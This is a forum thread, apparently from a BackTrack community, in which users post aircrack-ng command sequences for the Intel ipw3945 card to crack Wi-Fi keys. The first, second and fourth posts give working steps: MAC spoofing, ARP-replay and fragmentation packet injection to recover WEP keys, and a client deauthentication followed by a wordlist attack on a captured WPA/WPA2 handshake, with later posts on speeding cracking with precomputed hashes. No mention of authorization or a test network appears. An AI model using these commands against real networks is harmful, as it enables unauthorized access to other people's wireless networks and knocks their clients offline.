Results 1 to 6 of 6

Thread: [mini-tuto] Ipw3945 Injection Steps

  1. #1
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default [mini-tuto] Ipw3945 Injection Steps

    many persons have asked my steps for ipw3945 in pm, so i share them here....this is working for me.......but don't expect a high injection rate......

    i assume you got the ipwraw drivers installed....

    i assume too that you have updated aircrack to 0.9.1

    UNLOAD IPW3945 DRIVER

    LOAD IPWRAW DRIVER

    ifconfig wifi0 up && ifconfig rtap0 up

    echo '10' > /sys/class/net/wifi0/device/channel (set the channel)

    echo '11' > /sys/class/net/wifi0/device/rate (set the rate)

    airodump-ng -c 10 -w capture rtap0 (sniff with rtap0)

    echo 'XX:XX:XX:XX:XX' > /sys/class/net/wifi0/device/bssid (set ap mac)

    aireplay-ng -1 0 -a APMAC -h OURMAC -e APESSID wifi0

    aireplay-ng -3 -b APMAC -h OURMAC wifi0

    aircrack-ng -z capture*.cap


    this is very basics steps....hope it can helps.........
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  2. #2
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705

    Default

    Thanks Shaman, I added my confirmed method to the wiki yesterday to hopefully eliminate all these new posts.

    *EDIT* Confirmed Fragmentation attack and ARP request replay attack work long as you run each instance one at a time.

    *Note:There is a problem anytime you want to run more than one instance of aireplay-ng at the same time. Usually resulting in a hang or freeze. For instance every time I used aireplay-ng -1 6000 it would hang when trying to use aireplay-ng -2.

    I have had 100% success with fragmentation attack using this method:

    Ipwraw 2.0.0, 0.0.3
    Aircrack-ng 1.0 r659

    Code:
    #Starting @ IPWRAW showing wifi0 and rtap0 with iwconfig.
    ifconfig wifi0 down
    # If you are going to use macchanger use it now.
    macchanger --mac 00:11:22:33:44:55 wifi0
    
    #nano or echo ' ' > as Shaman posted.
    nano /sys/class/net/wifi0/device/channel
    ctrl x    Yes   Enter
    nano /sys/class/net/wifi0/device/rate
    # Change 108 to 2
    ctrl x    Yes   Enter
    nano /sys/class/net/wifi0/device/bssid
    #Remove 00:00:00:00:00:00 and replace with AP bssid
    ctrl x    Yes   Enter
    
    ifconfig wifi0 up
    airodump-ng --bssid 00:18:83:1B:68:72 -c 1 -w capture rtap0
    aireplay-ng -1 0 -e "M.A.D." -a 00:18:83:1B:68:72 -h 00:11:22:33:44:55 wifi0
    aireplay-ng -5 -b 00:18:83:1B:68:72 -h 00:11:22:33:44:55 wifi0 
    packetforge-ng -0 -a 00:18:83:1B:68:72 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0831-180343.xor -w arp-request
    aireplay-ng -2 -r arp-request wifi0
    aircrack-ng -z capture*.cap
    This will take you 2-5 minutes total to complete.
    Average pps: 497-521

    Anyone that has sucess with chop-chop method please post your Version of IPWRAW and Aircrack-ng and exact commands here.
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  3. #3
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    5

    Default

    Will this work for WPA/WPA2, or just WEP? Off the top of my head, I'd guess and say just WEP.

  4. #4
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705

    Default

    Quote Originally Posted by Cinder View Post
    Will this work for WPA/WPA2, or just WEP? Off the top of my head, I'd guess and say just WEP.
    The objective for WPA/WPA2 is to capture the authentication handshake and then use aircrack-ng to crack the pre-shared key.

    Code:
    airodump-ng --bssid 00:18:83:1B:68:72 -c 1 -w psk rtap0
    #Deauthenticate -c the wireless client
    #This should yield the 4-way handshake.
    aireplay-ng -0 1 -a 00:18:83:1B:68:72 -c 00:0F:B5:FD:FB:C2 wifi0
    aircrack-ng -w password.lst -b 00:18:83:1B:68:72 psk*.cap
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  5. #5
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    5

    Default

    why not use airolib-ng to speed up cracking time for WPA/WPA2? with several lists totaling 200+MB, would take days without airolib-ng :P

  6. #6
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    yes it's the best solution, but you need to precompute your hash and could be long with huge lists.....

    BUT it really speed up the all process because testing is much faster after precomputing hashes.........
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •